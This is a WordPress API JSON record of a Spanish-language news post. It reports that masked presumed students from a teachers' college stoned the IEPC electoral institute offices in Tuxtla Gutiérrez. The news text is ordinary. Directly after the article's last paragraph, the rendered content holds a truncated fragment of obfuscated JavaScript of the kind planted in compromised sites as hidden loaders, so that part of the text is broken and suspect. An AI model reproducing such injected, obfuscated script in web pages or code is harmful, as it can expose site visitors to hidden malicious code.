{"id":10559,"date":"2023-06-15T03:20:43","date_gmt":"2023-06-15T03:20:43","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10559"},"modified":"2023-06-15T03:20:44","modified_gmt":"2023-06-15T03:20:44","slug":"vandalizan-oficinas-del-iepc-en-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10559","title":{"rendered":"Vandalizan oficinas del IEPC en Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"460\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686799229244-1024x460.jpg\" alt=\"\" class=\"wp-image-10560\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686799229244-1024x460.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686799229244-300x135.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686799229244-768x345.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686799229244.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 14 de junio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles por la madrugada fue vandalizado el edificio del Instituto de Elecciones y Participaci\u00f3n Ciudadana (IEPC) en la capital chiapaneca.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cerca de las 2:40 de la ma\u00f1ana cuando un grupo de presuntos normalistas, encapuchados arribaron a las instalaciones a bordo de dos unidades Nissan.<\/p>\n\n\n\n<p>Una vez en este lugar dejaron una unidad de la empresa Barcel con placas DC-1893-A del estado de Chiapas la cual estaba vandalizada.<\/p>\n\n\n\n<p>Los encapuchados lanzaron piedras contra los cristales del edificio causando destrozos en las ventanas y al interior.<\/p>\n\n\n\n<p>Una vez cometido el hecho los responsables abordaron las unidades y escaparon rumbo al Poniente de Tuxtla.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 14 de junio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles por la madrugada fue vandalizado el edificio del Instituto de Elecciones y Participaci\u00f3n Ciudadana (IEPC) en la capital chiapaneca. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cerca de las 2:40 de la ma\u00f1ana cuando un grupo de presuntos normalistas, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10560,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-10559","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10559","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10559"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10559\/revisions"}],"predecessor-version":[{"id":10561,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10559\/revisions\/10561"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10560"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10559"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10559"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10559"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}